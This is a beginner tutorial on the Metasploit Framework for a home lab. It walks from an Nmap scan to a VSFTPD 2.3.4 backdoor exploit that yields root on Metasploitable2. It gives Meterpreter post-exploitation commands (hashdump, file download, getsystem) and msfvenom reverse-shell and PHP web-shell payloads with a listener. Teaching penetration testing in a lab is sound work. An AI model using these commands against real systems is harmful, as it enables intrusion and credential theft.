🔐
Home lab only. Every command in this tutorial targets
Metasploitable2 in your own isolated VirtualBox lab. Never run Metasploit against systems you do not own or have explicit written authorisation to test. Set up your legal lab first:
Ethical Hacking Lab Setup at Home.
Metasploit is the tool that appears in every penetration testing course, every OSCP preparation guide, and every professional ethical hacker’s toolkit. It contains over 2,300 exploit modules, 1,000 auxiliary modules, and hundreds of post-exploitation capabilities — and it is free. But most beginner Metasploit tutorials show you three commands and send you to figure out the rest yourself. This one does not. So lets start our complete metasploit tutorial for beginners – covering msfconsole, meterpreter commands , examples..
This tutorial walks you through Metasploit Framework from the beginning — how the console works, how to find exploits, how to configure them, how to select payloads, what to do after getting a shell, and a complete end-to-end walkthrough from Nmap scan to root shell against Metasploitable2 in your home lab. Everything on your own machines, completely legal, entirely practical.
What Is Metasploit Framework?
Metasploit Framework (MSF) is an open-source penetration testing platform developed and maintained by Rapid7. It provides a structured environment for finding, configuring, and launching exploit modules against systems with known vulnerabilities. In a professional context, it is used after vulnerability scanning to demonstrate the real-world impact of identified weaknesses — proving that a vulnerability is exploitable, not just theoretically present.
FREE
Open source, pre-installed Kali
Framework Architecture — What the Modules Actually Are
EXPLOITS
Modules that take advantage of specific CVEs or vulnerabilities to gain access to a target. Examples: ms17_010_eternalblue, vsftpd_234_backdoor, samba_usermap_script.
PAYLOADS
Code that runs on the target after exploit success. Determines what you can do: shell access, Meterpreter session, file upload. Reverse payloads connect back to you. Bind payloads open a listener on the target.
AUXILIARY
Scanning, fuzzing, and information-gathering tools. Port scanners, service probers, credential brute-forcers, denial-of-service testers. No payload required — used for reconnaissance and verification.
POST
Post-exploitation modules run after gaining access. Privilege escalation, credential harvesting, persistence, pivoting to other systems. Run from within Meterpreter sessions.
ENCODERS
Modify payload encoding to evade antivirus signature detection. Used with msfvenom when generating standalone payloads. Modern AV often detects encoded payloads — use sparingly.
NOPS
No-Operation sleds used in buffer overflow exploits. Less relevant for modern exploitation — primarily used in traditional binary exploitation scenarios taught in OSCP preparation.
msfconsole — Core Navigation Commands
securityelites.commsfconsole — Core Commands Reference
msf6 > help # List all commands
msf6 > search vsftpd # Search for modules by name/CVE/type
msf6 > search type:exploit platform:linux # Filter by type and platform
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(vsftpd) > info # Detailed module info + CVE + targets
msf6 exploit(vsftpd) > show options # Required + optional settings
msf6 exploit(vsftpd) > show payloads # Compatible payloads
msf6 exploit(vsftpd) > show targets # Target OS/version variations
msf6 exploit(vsftpd) > set RHOSTS 192.168.56.101 # Target IP
msf6 exploit(vsftpd) > set LHOST 192.168.56.1 # Your IP (for reverse shells)
msf6 exploit(vsftpd) > set PAYLOAD cmd/unix/interact
msf6 exploit(vsftpd) > check # Check if target is vulnerable (when supported)
msf6 exploit(vsftpd) > run # Execute the exploit
msf6 exploit(vsftpd) > back # Return to main msf6 > prompt
msf6 > sessions -l # List all active sessions
msf6 > sessions -i 1 # Interact with session 1
msf6 > db_nmap -sV 192.168.56.101 # Run Nmap and store results in MSF DB
msfconsole Core Commands — The commands you use on every Metasploit session: search (find modules), use (select), info/show options (review), set (configure), run (execute), sessions (manage). The db_nmap command runs Nmap and imports results directly into the Metasploit database for use with exploit modules.
Your First Exploit — VSFTPD 2.3.4 Backdoor on Metasploitable2
VSFTPD 2.3.4 is a famous example of a backdoor intentionally (or accidentally) introduced into an FTP server package. When a user connects with a username containing a smiley face (:)), the backdoor opens a shell on port 6200. Metasploitable2 runs this exact version — it is your legal practice target.
First, set up your home lab with both Kali Linux and Metasploitable2 in VirtualBox. The Metasploitable Labs hub has additional walkthroughs for every vulnerable service on the target.
# ─── STEP 1: Confirm Metasploitable is running and find its IP ──
$ nmap -sn 192.168.56.0/24
# Your Metasploitable IP appears — typically 192.168.56.101 # ─── STEP 2: Run service scan to confirm vsftpd 2.3.4 ────────
$ sudo nmap -sV -p 21 192.168.56.101
21/tcp open ftp vsftpd 2.3.4
# ─── STEP 3: Start msfconsole and find the exploit ──────────
$ sudo msfconsole
msf6 > search vsftpd 2.3.4
Matching Modules:
0 exploit/unix/ftp/vsftpd_234_backdoor … Excellent
# ─── STEP 4: Use, configure, and exploit ─────────────────────
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(vsftpd) > set RHOSTS 192.168.56.101
msf6 exploit(vsftpd) > run
[*] Command shell session 1 opened (192.168.56.1:49322 → 192.168.56.101:6200)
id
uid=0(root) gid=0(root) groups=0(root)
# Root shell obtained on your own Metasploitable2 VM ✓
Key concept: The exploit worked because VSFTPD 2.3.4 contains a backdoor — a deliberate vulnerability. “Excellent” reliability in the search results means it works consistently when the target runs the vulnerable version. Always verify the target service version with Nmap before running an exploit. See our full Nmap tutorial:
Day 1: Nmap Tutorial.
Meterpreter — Advanced Post-Exploitation
Most exploits give you a basic command shell. Meterpreter is an advanced payload that gives you a rich interactive session running entirely in memory — no files written to disk, encrypted communication back to your handler. It is the preferred payload for post-exploitation demonstrations in penetration tests.
securityelites.comMeterpreter Session — Post-Exploitation Command Reference
# ─── SYSTEM INFORMATION ──────────────────────────────────────
meterpreter > sysinfo # OS name, hostname, architecture
meterpreter > getuid # Current user context
meterpreter > getpid # Process ID of Meterpreter
meterpreter > ps # List all running processes
# ─── PRIVILEGE ESCALATION ────────────────────────────────────
meterpreter > getsystem # Attempt privilege escalation
meterpreter > run post/multi/recon/local_exploit_suggester # Suggest local exploits
# ─── CREDENTIAL HARVESTING ───────────────────────────────────
meterpreter > hashdump # Extract /etc/shadow hashes (root required)
meterpreter > run post/linux/gather/hashdump
# ─── FILE SYSTEM ─────────────────────────────────────────────
meterpreter > pwd # Current directory on target
meterpreter > ls # List files
meterpreter > download /etc/passwd # Download file from target
meterpreter > upload tool.sh /tmp/ # Upload file to target
# ─── SESSION MANAGEMENT ──────────────────────────────────────
meterpreter > shell # Drop to native system shell
meterpreter > background # Background session (CTRL+Z)
meterpreter > exit # Close session
Meterpreter Post-Exploitation Commands — These are the commands used in real penetration test engagements to demonstrate impact after initial access. sysinfo and getuid establish context. getsystem attempts privilege escalation. hashdump extracts password hashes for offline cracking. download retrieves files as evidence. All for authorised testing only.
Payloads — Reverse Shell vs Bind Shell
→ REVERSE SHELL (Most Common)
Target connects back to your listener. You start a listener first (LHOST + LPORT), then exploit runs and the target calls home. Works through most firewalls since the connection initiates outbound from the target.
windows/meterpreter/reverse_tcp
linux/x64/meterpreter/reverse_tcp
← BIND SHELL
Target opens a port and waits for you to connect. You connect to the target after the exploit runs. Simpler setup but requires the target port to be reachable — often blocked by firewalls. Less common in real engagements.
windows/meterpreter/bind_tcp
linux/x64/meterpreter/bind_tcp
msfvenom — Generate Standalone Payloads
msfvenom creates standalone payload files — executables, scripts, or shellcode — that you can deliver to a target and run. In penetration testing this is used to demonstrate client-side attack paths: phishing simulations, USB drops, or file-based delivery on authorised tests.
# Windows reverse Meterpreter executable
msfvenom -p windows/x64/meterpreter/reverse_tcp
LHOST=192.168.56.1
LPORT=4444
-f exe
-o payload.exe
# Linux reverse Meterpreter ELF binary
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f elf -o payload.elf
# PHP web shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f raw -o shell.php
# Start multi/handler listener to catch the reverse shell
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.56.1
msf6 > set LPORT 4444
msf6 > run
Full Lab Walkthrough — Nmap to Root on Metasploitable2
This is the complete beginner workflow: start from a blank Kali terminal, scan the target, find a vulnerability, exploit it, and demonstrate post-exploitation impact. Everything against your own Metasploitable2 VM.
# ═══ PHASE 1: RECONNAISSANCE ══════════════════════════════════
$ sudo nmap -sV -sC –top-ports 1000 -oA metasploitable_scan
192.168.56.101
21/tcp open ftp vsftpd 2.3.4 ← Backdoored FTP
22/tcp open ssh OpenSSH 4.7p1
139/tcp open netbios Samba smbd 3.X ← CVE-2007-2447
3306/tcp open mysql MySQL 5.0.51a ← Empty root password # ═══ PHASE 2: EXPLOITATION (vsftpd backdoor) ══════════════════
$ sudo msfconsole
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.56.101
msf6 > run
[*] Command shell session 1 opened
# ═══ PHASE 3: POST-EXPLOITATION ═══════════════════════════════
whoami → root
cat /etc/shadow → root:$1$… [password hashes extracted]
uname -a → Linux metasploitable 2.6.24-16-server
# ═══ PHASE 4: DOCUMENT FOR REPORT ════════════════════════════
# Screenshot each phase. Note: vuln found (vsftpd 2.3.4),
# exploit used (backdoor), evidence obtained (root shell, /etc/shadow)
# Severity: CRITICAL — unauthenticated remote root shell
Metasploit Is One Tool in 100 Days of Training
Frequently Asked Questions – Metasploit Tutorial for Beginners
What is Metasploit Framework?
Open-source penetration testing platform with 2,300+ exploit modules, payloads, auxiliary tools, and post-exploitation modules. Pre-installed on Kali Linux. Required for OSCP certification. Used by security professionals globally for authorised vulnerability assessment.
Is Metasploit legal to use?
Legal on systems you own or have explicit written authorisation to test: your home lab VMs, Metasploitable2, authorised pentest targets, TryHackMe, Hack The Box. Illegal against any system without authorisation regardless of intent.
What is Meterpreter?
Advanced Metasploit payload running entirely in memory — no files written to disk, encrypted communication. Provides rich post-exploitation interface: sysinfo, getuid, getsystem, hashdump, upload/download, shell access. Preferred payload for demonstration engagements.
What is Metasploitable2?
Intentionally vulnerable Linux VM by Rapid7 for Metasploit training. Contains dozens of vulnerable services deliberately — VSFTPD 2.3.4 backdoor, Samba CVE-2007-2447, weak MySQL, UnrealIRCD backdoor, and more. Legal to attack since you own it.
Metasploitable Labs hub →
What is the difference between an exploit and a payload?
Exploit: the mechanism that takes advantage of a vulnerability to deliver the payload. Payload: the code that runs on the target after the exploit succeeds — determines what access you have. Reverse payloads connect back to your listener. Bind payloads open a port on the target.
